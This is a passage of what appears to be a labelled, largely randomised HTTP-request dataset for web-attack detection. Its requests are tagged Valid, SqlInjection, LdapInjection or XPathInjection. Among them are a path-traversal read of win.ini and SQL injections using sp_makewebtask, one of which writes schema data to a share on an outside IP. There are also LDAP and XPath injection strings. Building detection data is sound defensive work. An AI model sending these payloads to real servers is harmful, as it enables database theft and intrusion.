GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 228.239.21.171
Connection: keep-alive
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-te99e3y;q=0.8, heahnrE-oe60o;q=0.9, tWt-dzlrch, 4ei-etatUd, EE8eeaSi-hnnotgdn;q=0.1
Cache-Control: taLhda='S'
Client-ip: 223.196.253.50
Cookie: h7ieh=teAte+caibih;6Onx=7eesiluiptceeusl;iraar=2743;N7j8YQh=wgets;o+;_CNzSsam=6428598;s6idteSo4e7gMy=31482164
Cookie2: $Version="35"
Date: Sun, 17 Jan 10 20:40:26 CET
ETag: "4LiPumcHRxrP39K9J"
Expect: 100-continue
From: lmfapce@abHed.be
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Sat, 24 Dec 05 24:43:09 GMT
If-Match: *
If-None-Match: "UmH3kYZ5rR1lfwb4.D"
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 2
MIME-Version: 2.7
Pragma: cpebbis='4p'
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic QXNVbjpuZXNoZQ==
Range: -3,456-488022
Referer: /leht/Evyolyo/mnaeiast/poeei.php3
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: sa1O/9.1
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: 6.6 www.tktth.jpeg:12
Transfer-Encoding: iOoms; he2POm=iles
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45123
Start - Id: 41117
class: SqlInjection
GET /H2l2pro9cnli7a/mTLGUPRdzp/hDVV_9hiXY8KO_phKi/n1ihuowt/eeehkL7/E@jtG6X3-S7CWp/no/GxRA/9UiJEM@rnodeyVf/a-F/eEmg4ra4.Z.9V/ide.htm?eho=48371&tncmdadd7lyrdOe=S9E&kehqiae=3&la7tdmpl5ienkys=aHoqa&gecelenefbueo=9z&cX1kRsock_streamB=874701&GmYC5=e+ksc&Wprocessing-instructionidLd4.Ophpjnph-R=%27%3B++EXEC+++master..sp_makewebtask+%22%5C%5C51.229.103.16%5Cte%5Crdsie.shtml%22%2C++++%22SELECT+*+++FROM+++++INFORMATION_SCHEMA.TABLES%22 HTTP/1.0
Host: 162.208.44.73:80
Connection: tradje
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.3, windows-1251;q=0.5
Accept-Encoding: *
Accept-Language: eyylo-mSnSi8j;q=0.6
Cache-Control: no-store
Client-ip: 252.114.224.184
Cookie: Ionnla=no fE@ul;euparnEemin82s=r rorzuten;de2saoiemn1t=5Mad7thotT
Cookie2: $Version="75"
Date: Tue, 16 Nov 04 22:26:58 GMT
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: a3snhd
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 25 Apr 08 07:44:16 CET
If-Unmodified-Since: Mon, 16 Jul 07 04:26:33 CET
If-Match: *
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 50
MIME-Version: 3.1
Pragma: Esi=nft
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic ZWR4YWM6YnR5YTI=
Range: -397
Referer: /p7oNeh.bin
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/1.6 (compatible; koMac5o; SunOS sun4u; rCntiodw; stc8lw; xandedouid)
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5422x020
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: compress
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 247.25.143.27
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41117
Start - Id: 28834
class: Valid
GET /sUgygmoC1En/ct4cw6/2s/1estt9RyotIhrl/eCN/S3nheEUAetiafwiol/ezdlTZjF2/nzLIEB-2vjJ3/eLvooiECorstegaogwd/ek0BtO@E/oaCWGnPOx/SmetaIvzw.tiff? HTTP/1.0
Host: www.ecde0kQlN.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987, windows-874
Accept-Encoding: identity, gzip;q=0.6, compress;q=0.3, compress;q=0.8, gzip;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 216.169.139.61
Cookie: mdz@MPol8fnce=3dr;laia1bu=64ecwx;klaaoboLleNrqsi=ii ;dtaeeuo2aneHtmm=62950713
Cookie2: $Version="272"
Date: Sun, 30 May 04 16:20:29 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Sun, 15 Oct 06 17:07:56 GMT
If-Unmodified-Since: Tue, 11 Mar 08 05:36:12 UTC
If-Match: "S4EjHPlMiE9Lfv_BZ"
If-None-Match: *
If-Range: "MBHz9mzTnZ602rjL6"
Max-Forwards: 6
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: Digest algorithm=lrtdp
Range: 3-,-55290
Referer: /tkrbe/edsl/lthIo/fdcw.avi
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: leenietw/2.0.7
UA-CPU: 68000
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: 5.8 www.LterzxcY.css:89, HTTP/3.8 128.13.200.130:81, HTTP/4.6 www.Esahy.css
Transfer-Encoding: deflate
Upgrade: cweSe/4.5, 2wd0e/5.6, Ttl/1.4
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28834
Start - Id: 14729
class: Valid
GET /ranEaohmrbMIoid5X.png?brtopwrtne5ne2n=9968&psa.8TLHs8=srteexM&iamaeH9r4tejt=%29e&EKK0d=n3xAhZtcQ-M%40 HTTP/1.1
Host: 108.162.230.3
Connection: keep-alive
Accept: text/*;q=0.7, image/*;q=0.1, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: ahapr=n9
Client-ip: 108.136.1.175
Cookie: seotmel=5556808
Cookie2: $Version="4"
Date: Wed, 05 May 10 02:06:05 CET
ETag: W/"UEDxOX_ClZSI9@rIW7"
Expect: unhenfm
From: nDone@1pntglpR.cz
If-Modified-Since: Thu, 09 Jun 05 14:09:27 GMT
If-Unmodified-Since: Thu, 09 Aug 07 21:25:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6732
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: NTLM c2E1emVjaDlNZWFybG1lYWJFc2lINWhjUlRyZXJ0YzI5cmJl
Range: 444847-,76-,3-393
Referer: http://8gsteec.gov/woetxen/ihe0r4q.pdf
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.0 (X11; U; Open BSD i586 5.4; OF-r1; rv:2.1.3) Gecko/71794924
UA-CPU: StrongARM
UA-Disp: 733,9202,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 887x095
Via: 6.6 63.18.20.86
Transfer-Encoding: winqaa
Upgrade: wka/5.4, itcal/5.7
Warning: 713 252.70.82.253 "8Dthiti" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14729
Start - Id: 27022
class: Valid
GET /kOdFEmqrWkaVQ/9U6_fqmG0K-yaWQ7T/stoblm/tdclymwlodbulee/juyGroIZr8connect9/l5a/80eai/m4L-Ku4rn1U/ohqocth.dll? HTTP/1.0
Host: www.eshaa.it
Connection: close
Accept: text/xml, text/*, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.222.48.227
Cookie: a0zTheIlh=6151;eRttilqysrvsh=nodeegaohtt;eanbi0=535737;tudt00=9fnca
Cookie2: $Version="651"
Date: Sat, 22 Jul 06 19:07:34 CET
ETag: "Fm4Sg6_iFK4ha6AB37Q"
Expect: 100-continue
From: erxoee@uwm9y1m1lh.net
If-Modified-Since: Fri, 22 Sep 06 19:32:31 GMT
If-Unmodified-Since: Wed, 16 Jan 08 09:03:42 GMT
If-Match: "K.-ZLbbsMulN8pWx"
If-None-Match: *
If-Range: Fri, 14 Apr 06 02:33:43 GMT
Max-Forwards: 316
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: NTLM dGV0c3RoQXVhTnVpZmVvdGhuZW9hZUhzdWhwbGh0aDFiZGRlZXR0aXhldG5B
Range: -2,41933-,520-237717
Referer: http://exuhVi.ch/7nag/rntOEtre/Aetisb/artune/cmputeee.sh
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.0 (compatible; MSIE 3.6; Open BSD i386; nzeex; brm1uo)
UA-CPU: StrongARM
UA-Disp: 1221,0592,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: HTTP/6.2 88.154.125.249
Transfer-Encoding: gzip
Upgrade: niuoa/4.9, niEhnt/1.9, inr8/1.3, leu/2.5
Warning: 451 www.isees7.css "snshatgt" 
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 95252684073786404
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27022
Start - Id: 17683
class: Valid
GET /7S/rgDspno1hm6vin7hea/tKFhmc6/2r/qireeyctne.gif?8tbvnsl=duzj71dt1&nreaatmreEea=eah&7pAlqhsNm23hA=ldduj&dAeonnEwoecnvah=he3&e0=7&qheel=c2Lfx&64i2k=echoechodaret%25wlan2%7Eetelnet1&joauunlrgngh=b&syHfl1ha2D7M=2011&priaei1ttiea=093295 HTTP/1.0
Host: www.mnBnntOtHt.ch
Connection: 72basp
Accept: text/plain, audio/x-wav;q=0.4
Accept-Charset: windows-1257;q=0.9
Accept-Encoding: 
Accept-Language: nfid-zun
Cache-Control: only-if-cached
Client-ip: 219.60.27.189
Cookie: oHopenvCxp_=tUCe;g2a0aungsl=yendt0tnaor3;acgz1bol=226;hbsst=e2ete;ylcogihn6td8=18731037;G9Mx3C@iK7=1840
Cookie2: $Version="9"
Date: Thu, 18 Jun 09 07:34:22 GMT
ETag: W/"tm6Ta.UE6NFaKj7"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Wed, 29 Sep 04 22:15:32 GMT
If-Unmodified-Since: Tue, 10 Apr 07 16:36:57 CET
If-Match: *
If-None-Match: "F.P6rXgUhLRUM8lY"
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 0875
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: ds5n eodzhhx=stpesdru
Authorization: Basic TjRhcmVieTowdDBuc3d1Nw==
Range: 0-,07-
Referer: /rsji/ytesm/sjUnea/eTvPai/asns.aspx
TE: trailers
Trailer: Accept-Language
User-Agent: ro5Vde_n http://www.dksntne.net
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: 8.9 www.sesonn.tiff, 8.1 105.58.89.29, 7.8 222.140.19.211
Transfer-Encoding: tteqe
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 607 www.ab3E5tss.png "3i5gweeoi8uw5re" 
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 09480693646047521886
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17683
Start - Id: 37693
class: LdapInjection
POST /mvr5toTDd2Aoleava/epca/TKLuqB4node@jNAphpXu/Sstlvay.jpg? HTTP/1.1
Content-Length: 183
Content-Language: smol,rb
Content-Encoding: gzip
Content-Location: /aNhrme/liebprc.conf
Content-MD5: b2FhVHJzRXBrT3k2M3JMbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Mon, 26 Feb 07 07:12:47 CET
Host: 184.72.84.192
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Sun, 05 Apr 09 06:11:47 GMT
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Fri, 21 Oct 05 15:39:02 UTC
If-Unmodified-Since: Wed, 22 Aug 07 20:40:01 GMT
If-Match: "M4sBFXsvPc1TBlTj"
If-None-Match: "ZG5C1BkDd_u7QIATMlT"
If-Range: "VzRTpI_OST6L736gzuR"
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: -5,143268-,83605-
Referer: /rp5s.jpeg
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: afwciee1mtcnnna9nOd
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.2 112.123.85.248, mgwt/6.4 95.22.0.37, FTP/5.7 www.diyrcnt.tiff:6
Transfer-Encoding: identity
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sch53GiAnsis=mkstdinlwj;a&Gijscript0dhZ3=4&tekryuE=Nnk6U\&eEh9s=96229&dnreng=) (    |   (displayName=had*)  (name=  had*)( mail=had*  )&etH1wsnltk7u=in0Ebn

End - Id: 37693
Start - Id: 38319
class: LdapInjection
GET /vWhHTuAuB/lt8AjNKSNSo2wisTjBK.msf?HphpZHV=m&s3oisiose=treirfhjenAs&I3Pwq1gYW5=rmneo%2Ftbil9nG&ht=0&et1ddsay=878%29%28++%7C+++%28a6u%3D*%29&arhacDnpleo=3312124&atThaf0hKpeyiiz=22757&7e=heo%27e%281xlunioneO%2Berttoew&ntnw5mlre=gF4BPuPw5&iqtiaemyaI5=n%3Fcrwrdeletez HTTP/1.1
Host: 13.213.81.176:6851
Connection: etdiqt4
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 168.193.87.154
Cookie: ud=elciyjnodekobjectdegi;tsFcsnhaosua=oR9Jd
Cookie2: $Version="35"
Date: Fri, 22 Aug 08 09:54:31 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Tue, 30 Jun 09 24:13:22 UTC
If-Unmodified-Since: Sun, 29 Mar 09 12:25:19 CET
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: "VKC4AgD2lbvjicK@et.q"
Max-Forwards: 9298
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic bmVPbmxzOnJ5bGF1
Range: 981434-8
Referer: /5h8eg/wtli.dll
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 5.3; he-et; rv:2.2.0) Gecko/26482283
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 036x964
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: compress
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38319
Start - Id: 30181
class: Valid
GET /eaalommreyieiafeyt/nUkUVS/t88J/2rALjxmailooH/yncU2puV/a2/odoewsBdtaecmnrsr/72hIT/2z/oK3tOd/9RTmi/jal_ti.asp?aeeaaifj=o&diKgttrh805n=esh HTTP/1.1
Host: www.ceentee55f.it
Connection: keep-alive
Accept: application/postscript, audio/*, image/*;q=0.5
Accept-Charset: x-mac-turkish;q=0.2, x-mac-ce, utf-7;q=0.9
Accept-Encoding: compress;q=0.8, deflate;q=0.6, compress;q=0.2, compress, deflate;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 210.246.213.241
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="502"
Date: Thu, 22 Jan 09 24:37:13 CET
ETag: "8cieUy-vSOpwIbKZ"
Expect: 100-continue
From: n30oip@sye2lHtos.gov
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Oct 04 01:35:02 CET
Max-Forwards: 146
MIME-Version: 5.5
Pragma: s0rb='sa1iwEsl'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM NGZsbWlkOGxoaW5zMmhpOGpxcmFlbnRzQWVtNWVscFR0b3plbm9v
Range: -5461,-03305,-419
Referer: http://www.rloy5.org/eodeveeu/maqi.wav
TE: chunked
Trailer: Connection
User-Agent: hlnGil
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: HTTP/4.2 www.dwdeiu.gif, HTTP/8.5 www.a2ydNa.css, xeeylr/4.2 www.grygt.tiff
Transfer-Encoding: gzip
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30181
Start - Id: 4202
class: Valid
POST /XdWFkxterm7JPhomeYYhtacces7/iy.2HnnGs2BjoGHcOmN/nCKal/u.TibTzPzF9Ast0/x3dKK/hlocation_j6U/wn9/lnf/te/s8yKx6U7VL8ftMyAwa/QM@Xhtacces1ghbo03.swf? HTTP/1.1
Content-Length: 21
Content-Language: jdwtbdoi,hen,Dj1i5e
Content-Encoding: deflate
Content-Location: http://snofnoe.biz/lUsoh/ah7on/etiLEiq/oaeanMe/fwnGwlo.doc
Content-MD5: dGVoZXZzY3NienlvM3JhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Nov 09 16:44:47 CET
Last-Modified: Mon, 11 Oct 04 05:59:16 GMT
Host: 196.5.60.9
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, x-mac-hebrew;q=0.5, windows-1251, koi8-r, iso-8859-6;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: 6rod='bnd'
Client-ip: 209.1.26.126
Cookie: hahrSs=787;ltei=niemuiydtmI75h;f8Frww6tueltcn=4729;nje6neflmseeejt=238;A4eL@=and
Cookie2: $Version="26"
Date: Sun, 15 Oct 06 15:43:26 CET
ETag: "2uSytG3cdgzdN3v_QSQ"
Expect: eremlkrh
From: tewe@gFoteninnd.com
If-Modified-Since: Sat, 29 Nov 08 15:30:11 CET
If-Unmodified-Since: Tue, 17 Feb 09 20:39:29 UTC
If-Match: *
If-None-Match: "tXL4Ew-BJN4rKbdKKNz"
If-Range: Fri, 11 Feb 05 03:11:07 CET
Max-Forwards: 398
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ys6ahg"
Authorization: Digest algorithm=1sasp4o
Range: 2-,878-,561480-5
Referer: http://www.rjqs.it/rnln/zischt/6stileto.js
TE: trailers,trailers
Trailer: Warning
User-Agent: soecsgiAusi9x
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.7 242.41.23.214
Transfer-Encoding: pRme; pnoO2=ewAet
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoemsoczoj=8818809104

End - Id: 4202
Start - Id: 41020
class: SqlInjection
GET /gQ_/nnttrx/ewmnagsdkhiclhodtRs/isH_1.jpg?position.J@Pk=idrn&tNyebcm3odx=oUbM&Q0E27lwK-rforms=Plibevf8pcTaelntmp%3Dsee&eidncl9wqder4a=%27%3B+++++EXEC++++master.dbo.sp_makewebtask++%27c%3A%5Cinetpub%5Cwwwroot%5Cost.css%27%2C+++%27SELECT+++++prss+FROM++rnho+++++WHERE++++xtype%3D%27%27U%27%27%27&h3=61095742 HTTP/1.1
Host: 183.114.214.154:31161
Connection: troclsrr
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 94yteal-heR;q=0.4, aesgl-ounhs;q=0.9
Cache-Control: no-transform
Client-ip: 109.121.222.214
Cookie: wz0iefo9yuy=6nCsy
Date: Thu, 28 Jan 10 02:53:22 CET
From: nr8inpt@ayntTOpcTs.it
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Wed, 24 Feb 10 06:04:02 GMT
If-Match: "xDdeGdPCY0X-Ouk4"
If-None-Match: *
Max-Forwards: 2
MIME-Version: 5.4
Proxy-Authorization: Basic Ymxld3Vobm46ZWV0dGU=
Authorization: NTLM ZGgzeWk5RmU5ZW9saHV6Z250YW50dWF5aWtvb25BaHpuYU5uaWFub203YnBI
Range: 770-,-93926
Referer: http://www.n8oihie.fr/hpcz0hO.js
TE: trailers,trailers,gzip;q=0.9
User-Agent: onanemhot (mXzV-K5.; uLrCu-PlC; 8zSH@K9z; i0c4J2)
Via: g4o/1.6 43.248.109.60
Transfer-Encoding: compress
Upgrade: izM/5.7, 1eiDbt/4.4
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41020
Start - Id: 4179
class: Valid
POST /fGX/o_enuDAg5M/eintoFxemo/tX9T6Iz55tKoGiP/osnntNNefot/datXPudKDbVzTXY.gif? HTTP/1.1
Content-Length: 22
Content-Language: to
Content-Encoding: gzip
Content-Location: /wLnUt/li0zleoi/eReltUo/njetoCe/dpveN.mspx
Content-MD5: bG1hcGxUZTlpczdldHNocw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 07:05:53 GMT
Last-Modified: Thu, 23 Oct 08 24:07:18 UTC
Host: www.bidr.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=923
Client-ip: 10.145.141.199
Cookie: othxGAn=088231;u5pSepiapos=k4XT
Cookie2: $Version="04"
Date: Sat, 18 Dec 04 24:10:33 CET
ETag: W/"pHux.aNZd@ok8ijbWu"
Expect: Tapl=rtgti
From: aamse8@eaazpr.org
If-Modified-Since: Thu, 28 Jul 05 12:06:58 GMT
If-Unmodified-Since: Sun, 08 Feb 04 18:02:55 CET
If-Match: "EVJHZueoUT@MS3f"
If-None-Match: *
If-Range: "10-y0sjb2EFXiXi4K"
Max-Forwards: 3015
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM aXRsbWdvRHNwYWRlNm5ndGFzb2RyZXNhdGZhb0FkbnRh
Authorization: ihea bytcect=cdta
Range: 6-,-5947,21-
Referer: http://www.ndgaott.st/evohar/a5ny/2cernt.avi
TE: chunked,trailers,deflate
Trailer: Referer
User-Agent: alZ9zBqkx http://www.kraUbAr6.org
UA-CPU: MIPS
UA-Disp: 192,906,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 123x6429
Via: zam/8.0 www.rwsznn.png, FTP/3.0 www.b9nd.tiff
Transfer-Encoding: compress
Upgrade: tIxs/2.9, corczi/8.6
Warning: 192 www.tNenn1f.htm "r7aundo7rsu6secuc" "Mon, 15 Aug 05 14:49:31 CET"
X-Forwarded-For: 128.136.26.61
X-Serial-Number: 70476
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fi9XsWiuC=tR49Q9fRk5nt

End - Id: 4179
Start - Id: 1374
class: Valid
GET /aerImthh9zatehnld/9Sj/NEacceptYxd/eO/rsVFaXhO/9eaiesn7sloaene/ey/UscriptKdsKupdateNxSkraccess_logtw/xY7PCGeF_/Aeiidng6gouueGO5.jsp?rcpaccess_log.Usy=tveFh&itseys2llsir=751256902&6ecnytsitteainc=or%27esie-+iiqpvf&6yEisreNSal=s+&1oiaJe6=691632&6e-hhttpHbwiTYR=l5CByVTiD4VD HTTP/1.0
Host: 149.61.137.80:80
Connection: ErSoStey
Accept: application/zip, image/jpeg, image/*;q=0.0
Accept-Charset: iso-10646-ucs-2, iso-8859-6
Accept-Encoding: identity, identity;q=0.6, identity;q=0.0, deflate;q=0.3, gzip
Accept-Language: ffooDhc-aeas, eps6-te6koe;q=0.1, kDhroyxt-sei;q=0.2, seoo-C1alwHs;q=0.8, vBcn-nree;q=0.1
Cache-Control: no-transform
Client-ip: 85.112.24.2
Cookie: erorz8naoa=7rjzTB6h;hIenr=thXKpFY6kE;mnh=9;oe=0ciwNlhxNtb;9Fdlocation=tea1iEre?jeo;dMObrf=9281296933
Cookie2: $Version="75"
Date: Tue, 07 Nov 06 02:51:23 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: ogja=dvneknhE
From: 35iGi@atmru1aewn.net
If-Modified-Since: Fri, 20 May 05 05:12:29 UTC
If-Unmodified-Since: Mon, 19 Jan 09 07:46:00 CET
If-Match: *
If-None-Match: "lwxo2I_y7xo-izs"
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 831
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic b3Rlb3QwYWk6YWRhbU5v
Authorization: Digest cnonce="ihocn"
Range: 24-
Referer: /9xocrtba/ruweho.cgi
TE: gzip,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 6.8; L8-1m; rv:1.7.0) Gecko/70301293
UA-CPU: 68000
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/3.2 www.d3hdut4.gif:6, 02ei/8.8 133.89.42.139:633, FTP/4.8 www.Thcur.jpeg:009
Transfer-Encoding: compress
Upgrade: xrS/2.3, 8tOrz/8.7, eor/4.3
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1374
Start - Id: 35649
class: XPathInjection
GET /eY9YNGVkbpQGHOm6RC/wohSofldoitm/ueahsdtoetce.dll?1n2nTlHs=tSkzpe%40ZSOPD&ahseb5Tits=haygczei&xodsmd5m2exdEG=e%24u++&to=nPz&ODsRmtm=5183&monn=%28i+++%3C++++count%28se%2Fchild%3A%3Atext%28%29%29+++++and++++j+++%3C+++count%28u4eet%2Fchild%3A%3Acomment%28%29%29++and++k++%3C++++count%28tsaet%2Fchild%3A%3A*%29+%29&psmnjTF68it=yv0bodyusrehrusr3p&rnnmor=g&e4imerg7rnhcf=40840038&inetcat8XY6var0=e4siptpcg&eltmtscR=T&obtYjmutmd2=Pa7%2F+eselectmrgT&n66irnr3lin=90893549&enroynso24=6280402 HTTP/1.1
Host: www.daaottbe.it:158
Connection: keep-alive
Accept: application/zip;q=0.9, application/postscript;q=0.7
Accept-Charset: windows-1250;q=0.9
Accept-Encoding: 
Accept-Language: anch-ymecqas, n-yWjne;q=0.6, nhneca-a2TadEn;q=0.1, sye-2, sis-sanWe
Cache-Control: min-fresh=5
Client-ip: 145.205.77.74
Cookie: jnzsyiCt=z7wb;6e=79730;eocn=binprocessing-instructionh;ncoG0Navshutdownobjectobjectx_=0723356;ueU=7207254081
Cookie2: $Version="053"
Date: Mon, 26 Nov 07 17:41:00 UTC
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Thu, 06 Oct 05 14:17:44 CET
